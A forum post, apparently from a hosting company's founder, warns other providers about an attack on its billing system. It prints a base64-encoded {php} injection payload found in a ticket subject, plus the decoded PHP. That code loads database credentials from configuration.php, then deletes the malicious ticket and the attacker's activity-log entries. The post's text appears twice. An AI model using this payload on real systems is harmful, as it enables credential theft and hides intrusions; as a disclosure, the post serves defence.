Hi everyone,
I dnt know if its related to recent hack or what,
In Mxzon's billing system, we got a a ticket with subject:
Decoded:
I dnt know if it worked, but it didn't harmed our billing system...
I deleted the ticket, plz be alerted as i think boxslots and servedome are also heaving issues...
I think if we disable eval it can make this hack zero...
what you guys suggest??
Regards,
Ali Arshad
Founder / CEO
Mxzon Hosting Solutions
(www.mxzon.com)
I dnt know if its related to recent hack or what,
In Mxzon's billing system, we got a a ticket with subject:
Code:
{php}eval(base64_decode('JHRleHQ9ZmlsZV9nZXRfY29udGVudHMoImNvbmZpZ3VyYXRpb24ucGhwIik7DQoNCg0KJHRleHQ9IHN0cl9yZXBsYWNlKCI8P3BocCIsICIiLCAkdGV4dCk7DQokdGV4dD0gc3RyX3JlcGxhY2UoIjw/IiwgIiIsICR0ZXh0KTsNCiR0ZXh0PSBzdHJfcmVwbGFjZSgiPz4iLCAiIiwgJHRleHQpOw0KDQpldmFsKCR0ZXh0KTsNCg0KJGRiPW15c3FsX2Nvbm5lY3QoJGRiX2hvc3QsJGRiX3VzZXJuYW1lLCRkYl9wYXNzd29yZCkgb3IgZGllKCJDYW4ndCBvcGVuIGNvbm5lY3Rpb24gdG8gTXlTUUwiKTsNCm15c3FsX3NlbGVjdF9kYigkZGJfbmFtZSkgb3IgZGllKCJDYW4ndCBzZWxlY3QgZGF0YWJhc2UiKTsNCiRkZWxldGUgPSJERUxFVEUgZnJvbSB0Ymx0aWNrZXRzIFdIRVJFIHRpdGxlIGxpa2UgMHgyNTdCNzA2ODcwN0QyNTsiOw0KbXlzcWxfcXVlcnkoJGRlbGV0ZSk7DQokZGVsZXRlMiA9IkRFTEVURSBmcm9tIHRibGFjdGl2aXR5bG9nICBXSEVSRSBpcGFkZHI9JyIuJF9TRVJWRVJbJ1JFTU9URV9BRERSJ10uIic7IjsNCm15c3FsX3F1ZXJ5KCRkZWxldGUyKTsNCg=='));{/php}
Decoded:
Code:
$text=file_get_contents("configuration.php");
$text= str_replace("<?php", "", $text);
$text= str_replace("<?", "", $text);
$text= str_replace("?>", "", $text);
eval($text);
$db=mysql_connect($db_host,$db_username,$db_password) or die("Can't open connection to MySQL");
mysql_select_db($db_name) or die("Can't select database");
$delete ="DELETE from tbltickets WHERE title like 0x257B7068707D25;";
mysql_query($delete);
$delete2 ="DELETE from tblactivitylog WHERE ipaddr='".$_SERVER['REMOTE_ADDR']."';";
mysql_query($delete2);
I dnt know if it worked, but it didn't harmed our billing system...
I deleted the ticket, plz be alerted as i think boxslots and servedome are also heaving issues...
I think if we disable eval it can make this hack zero...
what you guys suggest??
Regards,
Ali Arshad
Founder / CEO
Mxzon Hosting Solutions
(www.mxzon.com)